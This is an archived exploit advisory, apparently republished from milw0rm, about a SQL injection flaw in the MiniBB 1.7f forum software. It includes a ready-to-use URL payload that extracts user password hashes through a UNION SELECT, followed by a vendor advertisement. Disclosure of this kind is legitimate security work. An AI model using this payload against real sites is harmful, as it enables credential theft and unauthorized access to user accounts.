MiniBB 1.7f vulnerable to SQL Injection via userinfo action in index.php allowing unauthorized access.
Example:
http://[target]/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users/*
# milw0rm.com [2004-11-16]
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo